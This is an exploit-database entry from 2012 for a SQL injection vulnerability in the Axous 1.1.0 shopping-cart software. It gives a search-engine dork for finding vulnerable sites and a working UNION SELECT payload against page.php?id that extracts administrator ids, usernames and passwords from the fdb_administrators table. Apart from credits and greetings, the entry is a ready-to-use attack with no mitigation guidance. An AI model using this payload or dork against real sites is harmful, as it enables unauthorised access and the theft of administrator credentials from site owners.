id: 18141
date: 04/27/2012
title: Axous 1.1.0 SQL Injection Vulnerability
author: farbodmahini
cves: 

########################################################################################
#                                                                                      #
# Exploit Title : Axous 1.1.0 SQL Injection Vulnerabilitiy                             #
#                                                                                      #
# Author        : Secure-Land Security Team                                            #
#                                                                                      #
# Discovered By : farbodmahini                                                         #
#                                                                                      #
# Home          : Secure-Land.net                                                      #
#                                                                                      #
# Version       : All Version                                                          #
#                                                                                      #
# Vendor Link   : www.axous.com                                                        #
#                                                                                      #
# Contact       : farbodmahini@yahoo.fr , farbodmahini@gmail.com                       #
#                                                                                      #
# Security Risk : High                                                                 #
#                                                                                      #
#  DorK         : intext:"Powered by Axous 1.1.0"                                      #
#                                                                                      #
#                                                                                      #
########################################################################################
#  Exploit:
#
#
#  http://[target]/page.php?id=[SQL]
#
#  [~] SQL :
#
#  page.php?id=-1+union+select+1,group_concat(id,0x3a,username,0x3a,password),3+
#  from+fdb_administrators--
#
########################################################################################
#                                                                                      #
#   Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us                                  #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id              #
#                                                                                      #
########################################################################################



#  0day.today [2023-03-25]  #